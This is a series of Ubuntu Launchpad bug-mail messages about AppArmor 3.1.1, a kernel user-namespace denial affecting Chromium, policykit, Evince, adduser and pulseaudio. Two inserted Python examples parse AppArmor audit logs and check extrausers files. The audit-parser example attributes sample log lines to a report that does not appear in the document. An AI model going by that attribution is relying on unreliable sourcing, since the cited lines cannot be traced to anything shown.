+ The full ChangeLog can be seen at [1]
+
+
+ TESTING
+
+ This has been extensively tested by the security team - this includes
+ following the documented Ubuntu merges test plan[2] for AppArmor and the
+ extensive QA Regression Tests[3] for AppArmor as well. This ensures that
+ the various applications that make heavy use of AppArmor (LXD, docker,
+ lxc, dbus, libvirt, snapd etc) have all been exercised and no regressions
+ have been observed. All tests have passed and demonstrated both apparmor
+ and the various applications that use it to be working as expected.
+
+
+ BUILD LOGS
+
+ This is currently uploaded to https://launchpad.net/~alexmurray/+archive/ubuntu/lp1989309, build logs can be found on
+ Launchpad at:
+ https://launchpad.net/~alexmurray/+archive/ubuntu/lp1989309/+build/24491969 for amd64 etc
+
+
+ DEBDIFF
+
+ The debdiff can be found in the PPA:
+ https://launchpad.net/~alexmurray/+archive/ubuntu/lp1989309/+files/apparmor_3.0.7-1ubuntu1_3.1.1-0ubuntu1.diff.gz
+
+
+ INSTALL / UPGRADE LOG
+
+ The apt upgrade log is attached.
+
+
+ [1] https://gitlab.com/apparmor/apparmor/-/wikis/Release_Notes_3.1
+ [2] https://wiki.ubuntu.com/Process/Merges/TestPlans/AppArmor
+ [3] https://git.launchpad.net/qa-regression-testing/tree/scripts/test-apparmor.py

** Attachment added: "apparmor-3.1.1-0ubuntu1-apt-upgrade.log"
   https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1989309/+attachment/5617638/+files/apparmor-3.1.1-0ubuntu1-apt-upgrade.log

** Description changed:

  AppArmor 3.1.1 is the latest upstream version of the apparmor userspace
  tooling.
  This includes a large number of bug fixes since the 3.0.7 release which
  is currently in kinetic, as well as various cleanups and optimisations
  to the different tools to improve performance and maintainability.

  The full ChangeLog can be seen at [1]
-

  TESTING

  This has been extensively tested by the security team - this includes
  following the documented Ubuntu merges test plan[2] for AppArmor and the
  extensive QA Regression Tests[3] for AppArmor as well. This ensures that
- the various applications that make heavy use of AppArmor (LXD, docker,
- lxc, dbus, libvirt, snapd etc) have all been exercised and no regressions
- have been observed. All tests have passed and demonstrated both apparmor
+ the various applications that make heavy use of AppArmor (LXD, docker,
+ lxc, dbus, libvirt, snapd etc) have all been exercised and no regressions
+ have been observed. All tests have passed and demonstrated both apparmor
  and the various applications that use it to be working as expected.
-

  BUILD LOGS

  This is currently uploaded to https://launchpad.net/~alexmurray/+archive/ubuntu/lp1989309, build logs can be found on
  Launchpad at:
  https://launchpad.net/~alexmurray/+archive/ubuntu/lp1989309/+build/24491969 for amd64 etc
-

  DEBDIFF

  The debdiff can be found in the PPA:
  https://launchpad.net/~alexmurray/+archive/ubuntu/lp1989309/+files/apparmor_3.0.7-1ubuntu1_3.1.1-0ubuntu1.diff.gz
-

  INSTALL / UPGRADE LOG
-
- The apt upgrade log is attached.
-
+ The apt upgrade log is attached in
+ https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1989309/+attachment/5617638/+files/apparmor-3.1.1-0ubuntu1-apt-
+ upgrade.log

  [1] https://gitlab.com/apparmor/apparmor/-/wikis/Release_Notes_3.1
  [2] https://wiki.ubuntu.com/Process/Merges/TestPlans/AppArmor
  [3] https://git.launchpad.net/qa-regression-testing/tree/scripts/test-apparmor.py

** Description changed:

  AppArmor 3.1.1 is the latest upstream version of the apparmor userspace
  tooling.
  This includes a large number of bug fixes since the 3.0.7 release which
  is currently in kinetic, as well as various cleanups and optimisations
  to the different tools to improve performance and maintainability.

- The full ChangeLog can be seen at [1]
+ The full ChangeLog can be seen at [1]. Upstream does not provide a
+ ChangeLog file, however I have generated one based on the git commit
+ history of apparmor from the 3.0.7 tag to 3.1.1 as:
+
+ $ git log v3.0.7...v3.1.1 -- > ~/Downloads/apparmor-3.0.7-to-3.1.1-git-
+ log.log
+
+ This can be seen in the attached file.
+

  TESTING

  This has been extensively tested by the security team - this includes
  following the documented Ubuntu merges test plan[2] for AppArmor and the
  extensive QA Regression Tests[3] for AppArmor as well. This ensures that
  the various applications that make heavy use of AppArmor (LXD, docker,
  lxc, dbus, libvirt, snapd etc) have all been exercised and no
[Touch-packages] [Bug 1989309] Re: [FFe] apparmor 3.1.1 upstream release
** Attachment added: "apparmor-3.0.7-to-3.1.1-git-log.log"
   https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1989309/+attachment/5617640/+files/apparmor-3.0.7-to-3.1.1-git-log.log

** Description changed:

  AppArmor 3.1.1 is the latest upstream version of the apparmor userspace
  tooling.

  This includes a large number of bug fixes since the 3.0.7 release which
  is currently in kinetic, as well as various cleanups and optimisations
  to the different tools to improve performance and maintainability.

  The full ChangeLog can be seen at [1]. Upstream does not provide a
  ChangeLog file, however I have generated one based on the git commit
  history of apparmor from the 3.0.7 tag to 3.1.1 as:

  $ git log v3.0.7...v3.1.1 -- > ~/Downloads/apparmor-3.0.7-to-3.1.1-git-
  log.log

- This can be seen in the attached file.
-
+ This can be seen in the attached file
+ https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1989309/+attachment/5617640/+files/apparmor-3.0.7-to-3.1.1-git-
+ log.log

  TESTING

  This has been extensively tested by the security team - this includes
  following the documented Ubuntu merges test plan[2] for AppArmor and the
  extensive QA Regression Tests[3] for AppArmor as well. This ensures that
  the various applications that make heavy use of AppArmor (LXD, docker,
  lxc, dbus, libvirt, snapd etc) have all been exercised and no regressions
  have been observed. All tests have passed and demonstrated both apparmor
  and the various applications that use it to be working as expected.
  BUILD LOGS

  This is currently uploaded to https://launchpad.net/~alexmurray/+archive/ubuntu/lp1989309, build logs can be found on
  Launchpad at:
  https://launchpad.net/~alexmurray/+archive/ubuntu/lp1989309/+build/24491969 for amd64 etc

  DEBDIFF

  The debdiff can be found in the PPA:
  https://launchpad.net/~alexmurray/+archive/ubuntu/lp1989309/+files/apparmor_3.0.7-1ubuntu1_3.1.1-0ubuntu1.diff.gz

  INSTALL / UPGRADE LOG

  The apt upgrade log is attached in
  https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1989309/+attachment/5617638/+files/apparmor-3.1.1-0ubuntu1-apt-
  upgrade.log

  [1] https://gitlab.com/apparmor/apparmor/-/wikis/Release_Notes_3.1
  [2] https://wiki.ubuntu.com/Process/Merges/TestPlans/AppArmor
  [3] https://git.launchpad.net/qa-regression-testing/tree/scripts/test-apparmor.py

https://bugs.launchpad.net/bugs/1989309

Title: [FFe] apparmor 3.1.1 upstream release

Status in apparmor package in Ubuntu: New

Bug description:

AppArmor 3.1.1 is the latest upstream version of the apparmor userspace tooling.

This includes a large number of bug fixes since the 3.0.7 release which is currently in kinetic, as well as various cleanups and optimisations to the different tools to improve performance and maintainability.

The full ChangeLog can be seen at [1]. Upstream does not provide a ChangeLog file, however I have generated one based on the git commit history of apparmor from the 3.0.7 tag to 3.1.1 as:

$ git log v3.0.7...v3.1.1 -- > ~/Downloads/apparmor-3.0.7-to-3.1.1-git-log.log

This can be seen in the attached file
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1989309/+attachment/5617640/+files/apparmor-3.0.7-to-3.1.1-git-log.log

TESTING

This has been extensively tested by the security team - this includes following the documented Ubuntu merges test plan[2] for AppArmor and the extensive QA Regression Tests[3] for AppArmor as well. This ensures that the various applications that make heavy use of AppArmor (LXD, docker, lxc, dbus, libvirt, snapd etc) have all been exercised and no regressions have been observed. All tests have passed and demonstrated both apparmor and the various applications that use it to be working as expected.

BUILD LOGS

This is currently uploaded to https://launchpad.net/~alexmurray/+archive/ubuntu/lp1989309, build logs can be found on Launchpad at:
https://launchpad.net/~alexmurray/+archive/ubuntu/lp1989309/+build/24491969 for amd64 etc

DEBDIFF

The debdiff can be found in the PPA:
https://launchpad.net/~alexmurray/+archive/ubuntu/lp1989309/+files/apparmor_3.0.7-1ubuntu1_3.1.1-0ubuntu1.diff.gz

INSTALL / UPGRADE LOG

The apt upgrade log is attached in
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1989309/+attachment/5617638/+files/apparmor-3.1.1-0ubuntu1-apt-upgrade.log

[1] https://gitlab.com/apparmor/apparmor/-/wikis/Release_Notes_3.1
[2] https://wiki.ubuntu.com/Process/Merges/TestPlans/AppArmor
[3] https://git.launchpad.net/qa-regression-testing/tree/scripts/test-apparmor.py
[Touch-packages] [Bug 1990064] Re: unconfined profile denies userns_create for chromium based processes
This sounds like a kernel regression. The commit you link to is for SELinux, which is not enabled by default in Ubuntu, so I doubt it is that specifically - instead I suspect this is due to the following commit:

https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/kinetic/commit/?h=master-next&id=30bce26855c9171f8dee74d93308fd506730c914

The logic here:

int aa_profile_ns_perm(struct aa_profile *profile, struct common_audit_data *sa, u32 request)
{
    ...
    if (profile_unconfined(profile)) {
        if (!unprivileged_userns_restricted ||
            ns_capable_noaudit(current_user_ns(), CAP_SYS_ADMIN))
            return 0;
        aad(sa)->info = "User namespace creation restricted";
        /* fall through to below allows complain mode to override */
    } else {
        struct aa_ruleset *rules = list_first_entry(&profile->rules, typeof(*rules), list);
        aa_state_t state;

        state = RULE_MEDIATES(rules, aad(sa)->class);
        if (!state)
            /* TODO: add flag to complain about unmediated */
            return 0;
        perms = *aa_lookup_perms(&rules->policy, state);
    }

    aa_apply_modes_to_perms(profile, &perms);
    return aa_check_perms(profile, &perms, request, sa, audit_ns_cb);
}

Seems to indicate that all unconfined processes that do not have CAP_SYS_ADMIN will be denied the ability to use user namespaces - this feels like a definite regression / policy change within the kernel itself. Should the kernel instead be built with CONFIG_SECURITY_APPARMOR_RESTRICT_USERNS=n ? Or is this code not doing what it was intended to do.

** Also affects: linux (Ubuntu)
   Importance: Undecided
       Status: New
https://bugs.launchpad.net/bugs/1990064

Title: unconfined profile denies userns_create for chromium based processes

Status in apparmor package in Ubuntu: New
Status in linux package in Ubuntu: New

Bug description:

For Ubuntu 22.10, since the last kernel update, I can't launch any chromium based browser, due to apparmor denying userns_create

dmesg shows:

apparmor="DENIED" operation="userns_create" class="namespace" info="User namespace creation restricted" error=-13 profile="unconfined" pid=21323 comm="steamwebhelper" requested="userns_create" denied="userns_create"

This happens for every process which uses a chromium engine, like google chrome itself or in this case steamwebhelper.

Might be related to this change?: https://patchwork.kernel.org/project/netdevbpf/patch/20220801180146.1157914-5-f...@cloudflare.com/ not sure if it got merged in this form though..
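Two shapes of AppArmor audit line appear on this page: the `dmesg` excerpt in the chromium snap report (LP: #1992930, with its `[ secs ] audit: type=1400 audit(ts:seq):` prefix) and the bare `apparmor="DENIED" operation="userns_create" ...` line quoted in this bug. The following is an added example, not code from any of these reports or from the AppArmor project, of parsing both shapes and sorting denials the way the comment above does: a denial under a named profile is something a profile rule could address, whereas a denial logged with `profile="unconfined"` cannot be fixed in policy because it comes from the kernel-side restriction. The sample lines are copied from those two reports except the last one, whose `dmesg` prefix is constructed.

```python
import re
from collections import Counter

# key="quoted value"  or  key=unquoted (e.g. pid=3518, error=-13)
_KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_audit_line(line: str):
    """Return the key/value fields of an AppArmor audit line, or None.

    Everything before 'apparmor=' (the dmesg timestamp and the
    'audit: type=1400 audit(ts:seq):' prefix) is dropped so that those
    tokens never leak into the field dictionary.
    """
    idx = line.find("apparmor=")
    if idx < 0:
        return None
    fields = {}
    for m in _KV_RE.finditer(line[idx:]):
        fields[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    return fields


def classify_denial(fields):
    """'profile-rule' for a denial under a named profile, 'unconfined-restriction'
    for a denial logged while the task was unconfined (no profile rule can
    allow that; it is a kernel-side restriction, as with userns_create above),
    None for anything that is not a denial (e.g. apparmor="STATUS" loads)."""
    if fields is None or fields.get("apparmor") != "DENIED":
        return None
    if fields.get("profile") == "unconfined":
        return "unconfined-restriction"
    return "profile-rule"


def triage(text: str):
    """Count DENIED events per (profile, operation, target) in two buckets."""
    buckets = {"profile-rule": Counter(), "unconfined-restriction": Counter()}
    for line in text.splitlines():
        fields = parse_audit_line(line)
        cat = classify_denial(fields)
        if cat is None:
            continue
        # File denials carry name=; namespace denials carry requested=.
        target = fields.get("name") or fields.get("requested") or ""
        key = (fields.get("profile", ""), fields.get("operation", ""), target)
        buckets[cat][key] += 1
    return buckets


# Lines 2-4 are from the reports on this page; line 5's dmesg prefix is constructed.
SAMPLE_DMESG = """\
[ 1510.255228] loop7: detected capacity change from 0 to 293648
[ 1519.485025] audit: type=1400 audit(1665727479.378:63): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="snap.chromium.chromium" pid=3500 comm="apparmor_parser"
[ 1520.203518] audit: type=1400 audit(1665727480.098:64): apparmor="DENIED" operation="getattr" class="file" profile="snap-update-ns.chromium" name="/meta/snap.yaml" pid=3518 comm="6" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
[ 1520.245234] audit: type=1400 audit(1665727480.142:65): apparmor="DENIED" operation="getattr" class="file" profile="snap-update-ns.chromium" name="/usr/local/share/fonts/" pid=3518 comm="6" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
[ 1530.000000] audit: type=1400 audit(1665727490.000:70): apparmor="DENIED" operation="userns_create" class="namespace" info="User namespace creation restricted" error=-13 profile="unconfined" pid=21323 comm="steamwebhelper" requested="userns_create" denied="userns_create"
"""

if __name__ == "__main__":
    for bucket, counts in triage(SAMPLE_DMESG).items():
        print(bucket)
        for (profile, op, target), n in counts.items():
            print(f"  {n}x {profile}: {op} {target}")
```

Note that `profile="unconfined"` on an `apparmor="STATUS"` line only says which profile `apparmor_parser` ran under while loading policy; the classifier ignores those by checking for `DENIED` first.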
[Touch-packages] [Bug 1989309] [NEW] [FFe] apparmor 3.1.1 upstream release
Public bug reported:

Placeholder for preparation of AppArmor 3.1.1 for kinetic.

** Affects: apparmor (Ubuntu)
     Importance: Undecided
         Status: New

** Summary changed:

- [FFe] apparmor 3.1.0 upstream release
+ [FFe] apparmor 3.1.1 upstream release

https://bugs.launchpad.net/bugs/1989309

Title: [FFe] apparmor 3.1.1 upstream release

Status in apparmor package in Ubuntu: New

Bug description:

Placeholder for preparation of AppArmor 3.1.1 for kinetic.
[Touch-packages] [Bug 1972654] Re: [security review] Sync policykit-1 0.120-6 (main) from Debian experimental
> I do not intend to take further action to modify those packages. If it is a
> blocker for Ubuntu
> that they are fixed, then someone from Ubuntu will need to do that work.

Given the relationship between the packages has now changed - ie. polkitd-pkla is not mutually exclusive from the javascript backend and then allows both legacy pkla policies as well as the "new" javascript policies to be handled - then this is not a blocker anymore from my point of view. I suspect Marc may also agree (especially given the relatively small number of packages in this category).

https://bugs.launchpad.net/bugs/1972654

Title: [security review] Sync policykit-1 0.120-6 (main) from Debian experimental

Status in policykit-1 package in Ubuntu: Confirmed

Bug description:

Please sync policykit-1 0.120-6 (main) from Debian experimental

Changelog entries since current kinetic version 0.105-33:
https://tracker.debian.org/media/packages/p/policykit-1/changelog-0.120-6

In particular, see the 0.120-4 changelog entry.

I am filing a bug for Security Team review.

Previously, Debian and Ubuntu developers agreed to keep using the last version of policykit before it switched to using JavaScript rules. But that was years ago. I believe Debian & Ubuntu are the only distros to have opted out of the new policykit. It is harder to maintain the old style rules when upstream rules use the new format. And it is a challenge to backport security and other bugfixes from the new series, without making mistakes or missing important details.

There was a proposal to use duktape instead of mozjs for the JavaScript interpreter but I don't think that's been merged yet.

It appears the Debian maintainer is considering switching Debian to the updated version in time for the next Debian Stable release (so uploading to unstable later this year).

My requested deadline is August 25, Ubuntu 22.10 Feature Freeze.
[Touch-packages] [Bug 283115] Re: Gimp: toolbox windows can't be minimized
** Changed in: gimp (Ubuntu)
       Status: Fix Released => Invalid

https://bugs.launchpad.net/bugs/283115

Title: Gimp: toolbox windows can't be minimized

Status in The Gimp: Fix Released
Status in GTK+: Unknown
Status in gimp package in Ubuntu: Invalid
Status in gtk+2.0 package in Ubuntu: New

Bug description:

gimp 2.6 in intrepid: it is impossible to minimize toolbar windows; they have only a x-Button to close

ideally, these windows should be minimized automatically when the (last) Gimp image window is minimized

Update

While waiting, I designed some sort of workaround : Gnome>System>Preferences>Windows>Double-click titlebar>Roll up
[Touch-packages] [Bug 1969896] Re: Evince Document Viewer(42.0) does not remember last page in 22.04 and opens in a tiny window when launched
** Also affects: evince (Ubuntu Jammy)
   Importance: Undecided
       Status: New

** Also affects: apparmor (Ubuntu Jammy)
   Importance: Undecided
       Status: New

** Also affects: evince (Ubuntu Kinetic)
   Importance: High
       Status: In Progress

** Also affects: apparmor (Ubuntu Kinetic)
   Importance: High
       Status: Confirmed

** Changed in: apparmor (Ubuntu Kinetic)
       Status: Confirmed => In Progress

** Changed in: apparmor (Ubuntu Jammy)
       Status: New => In Progress

** Changed in: apparmor (Ubuntu Kinetic)
     Assignee: (unassigned) => Alex Murray (alexmurray)

** Changed in: apparmor (Ubuntu Jammy)
     Assignee: (unassigned) => Alex Murray (alexmurray)

** Changed in: apparmor (Ubuntu Jammy)
   Importance: Undecided => High

https://bugs.launchpad.net/bugs/1969896

Title: Evince Document Viewer(42.0) does not remember last page in 22.04 and opens in a tiny window when launched

Status in apparmor package in Ubuntu: In Progress
Status in evince package in Ubuntu: In Progress
Status in apparmor source package in Jammy: In Progress
Status in evince source package in Jammy: New
Status in apparmor source package in Kinetic: In Progress
Status in evince source package in Kinetic: In Progress

Bug description:

Just switched from Ubuntu 20.04 to 22.04 and realized that Document Viewer no longer opens on the last viewed page and doesn't remember the side pane preference even after using the "Save Current Settings as Default" option.

Kindly advise

ProblemType: Bug
DistroRelease: Ubuntu 22.04
Package: evince 42.1-3
ProcVersionSignature: Ubuntu 5.15.0-25.25-generic 5.15.30
Uname: Linux 5.15.0-25-generic x86_64
NonfreeKernelModules: nvidia_modeset nvidia
ApportVersion: 2.20.11-0ubuntu82
Architecture: amd64
CasperMD5CheckResult: unknown
CurrentDesktop: ubuntu:GNOME
Date: Fri Apr 22 15:58:50 2022
InstallationDate: Installed on 2022-03-19 (34 days ago)
InstallationMedia: Ubuntu 20.04.4 LTS "Focal Fossa" - Release amd64 (20220223)
ProcEnviron:
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=<set>
 LANG=en_US.UTF-8
 SHELL=/bin/bash
SourcePackage: evince
UpgradeStatus: Upgraded to jammy on 2022-04-21 (0 days ago)
[Touch-packages] [Bug 1969896] Re: Evince Document Viewer(42.0) does not remember last page in 22.04 and opens in a tiny window when launched
FYI I have sent a MR to the upstream AppArmor project to remove this dbus deny rule from the exo-open abstraction:
https://gitlab.com/apparmor/apparmor/-/merge_requests/884

https://bugs.launchpad.net/bugs/1969896

Title: Evince Document Viewer(42.0) does not remember last page in 22.04 and opens in a tiny window when launched

Status in apparmor package in Ubuntu: New
Status in evince package in Ubuntu: In Progress

Bug description:

Just switched from Ubuntu 20.04 to 22.04 and realized that Document Viewer no longer opens on the last viewed page and doesn't remember the side pane preference even after using the "Save Current Settings as Default" option.

Kindly advise

ProblemType: Bug
DistroRelease: Ubuntu 22.04
Package: evince 42.1-3
ProcVersionSignature: Ubuntu 5.15.0-25.25-generic 5.15.30
Uname: Linux 5.15.0-25-generic x86_64
NonfreeKernelModules: nvidia_modeset nvidia
ApportVersion: 2.20.11-0ubuntu82
Architecture: amd64
CasperMD5CheckResult: unknown
CurrentDesktop: ubuntu:GNOME
Date: Fri Apr 22 15:58:50 2022
InstallationDate: Installed on 2022-03-19 (34 days ago)
InstallationMedia: Ubuntu 20.04.4 LTS "Focal Fossa" - Release amd64 (20220223)
ProcEnviron:
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=<set>
 LANG=en_US.UTF-8
 SHELL=/bin/bash
SourcePackage: evince
UpgradeStatus: Upgraded to jammy on 2022-04-21 (0 days ago)
[Touch-packages] [Bug 1978042] Re: adduser doesn't support extrausers for group management
This looks like a duplicate of LP: #1959375

https://bugs.launchpad.net/bugs/1978042

Title: adduser doesn't support extrausers for group management

Status in adduser package in Ubuntu: Fix Released
Status in shadow package in Ubuntu: Fix Released
Status in adduser source package in Focal: New
Status in shadow source package in Focal: New
Status in adduser source package in Impish: Fix Released
Status in shadow source package in Impish: Fix Released
Status in adduser source package in Jammy: Fix Released
Status in shadow source package in Jammy: Fix Released
Status in adduser source package in Kinetic: Fix Released
Status in shadow source package in Kinetic: Fix Released

Bug description:

[Impact]

When using adduser --extrausers on Ubuntu Core the command attempts to use the /etc/group file instead of /var/lib/extrausers/group. e.g. the following commands will fail:

  $ adduser --extrausers user group
  $ adduser --extrausers --ingroup group user

[Test Plan]

1. Install libnss-extrausers
2. Add a new group:
   $ sudo adduser --extrausers --group test-group
3. Create a new user with this group:
   $ adduser --extrausers --ingroup test-group test-user1
4. Create a new user and add them to this group:
   $ adduser --extrausers test-user2
   $ adduser --extrausers test-user2 test-group

Expected result: Two new users (test-user1 and test-user2) are successfully added to the system and are entered in /var/lib/extrausers/{passwd,shadow}. A new group (test-group) is successfully added to /var/lib/extrausers/group and contains the new users.

[Where problems could occur]

Existing users of adduser and gpasswd that don't use --extrausers are unlikely to hit any issues, as their codepath is unchanged. Existing users that use --extrausers will have a behavior change, but the existing behavior was to fail so this is unlikely to introduce any new issues.

There is the risk of introducing new bugs by this change, but it has been used since impish without any issues being detected.
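A way to check the test plan's expected result mechanically, as an added example that is not part of the bug report or of the adduser package: it parses passwd- and group-format files in the layout libnss-extrausers reads and reports anything that deviates from the expected result. The /var/lib/extrausers paths, the helper names and the sample file contents are assumptions or constructed for the example.

```python
"""Check the [Test Plan] expected result against the extrausers databases.

Added example (not from the bug report or the adduser package). It parses
/var/lib/extrausers/passwd and /var/lib/extrausers/group, which use the
same 7- and 4-field colon format as /etc/passwd and /etc/group, and
checks that test-user1 has test-group as primary group, that test-user2
is a supplementary member of test-group, and that every primary gid in
the extrausers passwd resolves to a group in the extrausers group file.
Only the extrausers databases are consulted, so a primary gid that is
defined in /etc/group instead is reported too. Sample data is constructed.
"""
import os

EXTRAUSERS_DIR = "/var/lib/extrausers"   # assumed location used by libnss-extrausers


def parse_passwd(text: str) -> dict:
    """name -> {uid, gid, home, shell} from passwd-format text."""
    users = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"malformed passwd entry: {line!r}")
        name, _pw, uid, gid, _gecos, home, shell = fields
        users[name] = {"uid": int(uid), "gid": int(gid), "home": home, "shell": shell}
    return users


def parse_group(text: str) -> dict:
    """name -> {gid, members} from group-format text."""
    groups = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 4:
            raise ValueError(f"malformed group entry: {line!r}")
        name, _pw, gid, members = fields
        groups[name] = {"gid": int(gid), "members": [m for m in members.split(",") if m]}
    return groups


def check_expected_result(passwd_text: str, group_text: str, group: str = "test-group",
                          primary_user: str = "test-user1",
                          member_user: str = "test-user2") -> list:
    """Return a list of problems; an empty list means the expected result holds."""
    users = parse_passwd(passwd_text)
    groups = parse_group(group_text)
    problems = []
    for user in (primary_user, member_user):
        if user not in users:
            problems.append(f"{user} missing from passwd")
    if group not in groups:
        problems.append(f"{group} missing from group")
        return problems                      # nothing else can be checked
    gid = groups[group]["gid"]
    # step 3: --ingroup makes test-group the primary group of test-user1
    if primary_user in users and users[primary_user]["gid"] != gid:
        problems.append(f"{primary_user}: primary gid {users[primary_user]['gid']} is not {group} ({gid})")
    # step 4: "adduser --extrausers test-user2 test-group" adds a supplementary membership
    if member_user not in groups[group]["members"]:
        problems.append(f"{member_user} is not a member of {group}")
    known_gids = {g["gid"] for g in groups.values()}
    for name, info in users.items():
        if info["gid"] not in known_gids:
            problems.append(f"{name}: primary gid {info['gid']} has no group entry")
    return problems


def check_extrausers_dir(directory: str = EXTRAUSERS_DIR) -> list:
    """Run the check against the real extrausers files (needs read access)."""
    with open(os.path.join(directory, "passwd"), encoding="utf-8") as f:
        passwd_text = f.read()
    with open(os.path.join(directory, "group"), encoding="utf-8") as f:
        group_text = f.read()
    return check_expected_result(passwd_text, group_text)


# Constructed samples: the two files as they should look after the test plan,
# and a variant in which the membership step of step 4 silently did nothing.
SAMPLE_PASSWD = (
    "test-user1:x:1001:1001::/home/test-user1:/bin/bash\n"
    "test-user2:x:1002:1002::/home/test-user2:/bin/bash\n"
)
SAMPLE_GROUP_OK = "test-group:x:1001:test-user2\ntest-user2:x:1002:\n"
SAMPLE_GROUP_MISSING_MEMBER = "test-group:x:1001:\ntest-user2:x:1002:\n"

if __name__ == "__main__":
    print("sample ok:", check_expected_result(SAMPLE_PASSWD, SAMPLE_GROUP_OK))
    print("sample broken:", check_expected_result(SAMPLE_PASSWD, SAMPLE_GROUP_MISSING_MEMBER))
```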
[Touch-packages] [Bug 1977710] Re: /etc/adduser.conf.dpkg-save created by postinst since 3.121ubuntu1
From what I can see of this postinst this looks to be a bug from adduser in Debian itself - and would appear to come from https://salsa.debian.org/debian/adduser/-/blob/master/debian/postinst#L33 - i.e. if the default value is unchanged then an /etc/adduser.conf.dpkg-save is always generated when the value of DIR_MODE is appended to /etc/adduser.conf.

Can you confirm if this also occurs when debootstrapping a system from Debian?

** Changed in: adduser (Ubuntu)
   Status: New => Incomplete

https://bugs.launchpad.net/bugs/1977710

Title: /etc/adduser.conf.dpkg-save created by postinst since 3.121ubuntu1

Status in adduser package in Ubuntu: Incomplete

Bug description:

Since version 3.121ubuntu1 adduser's postinst script creates the /etc/adduser.conf.dpkg-save file on debootstrap's root filesystem, that is, even when /etc/adduser.conf doesn't exist prior to package installation.

Because of the change below the postinst script changes the packaged /etc/adduser.conf and creates /etc/adduser.conf.dpkg-save as a backup:

  - Enable private home directories by default (LP: #48734)
    + Set DIR_MODE=0750 in the default adduser.conf
    + Change the description and default value to select private home directories by default in debconf template
    + Change the DIR_MODE when private home directories is configured via debconf from 0751 to 0750 to ensure files are truly private

The .dpkg-save file shouldn't be present on a debootstrapped system.
[Touch-packages] [Bug 1871148] Re: services start before apparmor profiles are loaded
@mardy I thought we had snapd.apparmor specifically to avoid this scenario but I can't see that service mentioned at all in systemd-analyze plot...

https://bugs.launchpad.net/bugs/1871148

Title: services start before apparmor profiles are loaded

Status in AppArmor: Invalid
Status in snapd: Fix Released
Status in apparmor package in Ubuntu: Fix Released
Status in snapd package in Ubuntu: Fix Released
Status in zsys package in Ubuntu: Invalid
Status in apparmor source package in Focal: Fix Released
Status in snapd source package in Focal: Fix Released
Status in zsys source package in Focal: Invalid

Bug description:

Per discussion with Zyga in #snapd on Freenode, I have hit a race condition where services are being started by the system before apparmor has been started. I have a complete log of my system showing the effect somewhere within at https://paste.ubuntu.com/p/Jyx6gfFc3q/. Restarting apparmor using `sudo systemctl restart apparmor` is enough to bring installed snaps back to full functionality.

Previously, when running any snap I would receive the following in the terminal:

---
cannot change profile for the next exec call: No such file or directory
snap-update-ns failed with code 1: File exists
---

Updated to add for Jamie:

$ snap version
snap    2.44.2+20.04
snapd   2.44.2+20.04
series  16
ubuntu  20.04
kernel  5.4.0-21-generic
[Touch-packages] [Bug 1975407] Re: pulseaudio is getting crashed
Thanks for taking the time to report this bug and helping to make Ubuntu better. We appreciate the difficulties you are facing, but this appears to be a "regular" (non-security) bug. I have unmarked it as a security issue since this bug does not show evidence of allowing attackers to cross privilege boundaries nor directly cause loss of data/privacy. Please feel free to report any other bugs you may find.

** Information type changed from Private Security to Public

https://bugs.launchpad.net/bugs/1975407

Title: pulseaudio is getting crashed

Status in pulseaudio package in Ubuntu: New

Bug description:

Operating System: Ubuntu 22.04
Life cycle: LTS
Architecture: AMD64
Kernel version (uname -a): 5.15.0-30-generic

ProblemType: Bug
DistroRelease: Ubuntu 22.04
Package: pulseaudio 1:15.99.1+dfsg1-1ubuntu1
ProcVersionSignature: Ubuntu 5.15.0-30.31-generic 5.15.30
Uname: Linux 5.15.0-30-generic x86_64
ApportVersion: 2.20.11-0ubuntu82.1
Architecture: amd64
AudioDevicesInUse:
 USER PID ACCESS COMMAND
 /dev/snd/controlC0: johnm 3822 F pulseaudio
CasperMD5CheckResult: unknown
CurrentDesktop: ubuntu:GNOME
Date: Sun May 22 12:08:58 2022
PulseList:
 Error: command ['pacmd', 'list'] failed with exit code 1: XDG_RUNTIME_DIR (/run/user/1000) is not owned by us (uid 0), but by uid 1000! (This could e.g. happen if you try to connect to a non-root PulseAudio as a root user, over the native protocol. Don't do that.)
 No PulseAudio daemon running, or not running as session daemon.
SourcePackage: pulseaudio
Symptom: audio
UpgradeStatus: No upgrade log present (probably fresh install)
dmi.bios.date: 04/11/2019
dmi.bios.release: 15.104
dmi.bios.vendor: Hewlett-Packard
dmi.bios.version: 68IRR Ver. F.68
dmi.board.name: 17F6
dmi.board.vendor: Hewlett-Packard
dmi.board.version: KBC Version 58.21
dmi.chassis.type: 10
dmi.chassis.vendor: Hewlett-Packard
dmi.ec.firmware.release: 88.33
dmi.modalias: dmi:bvnHewlett-Packard:bvr68IRRVer.F.68:bd04/11/2019:br15.104:efr88.33:svnHewlett-Packard:pnHPProBook4540s:pvrA1008C11:rvnHewlett-Packard:rn17F6:rvrKBCVersion58.21:cvnHewlett-Packard:ct10:cvr:skuB7A48EA#ABV:
dmi.product.family: 103C_5336AN G=N L=BUS B=HP S=PRO
dmi.product.name: HP ProBook 4540s
dmi.product.sku: B7A48EA#ABV
dmi.product.version: A1008C11
dmi.sys.vendor: Hewlett-Packard
modified.conffile..etc.xdg.autostart.pulseaudio.desktop: [modified]
mtime.conffile..etc.xdg.autostart.pulseaudio.desktop: 2022-01-28T22:42:20.933634
[Touch-packages] [Bug 1975408] Re: Performance is much worse than expected (Normal friendly behaviors)
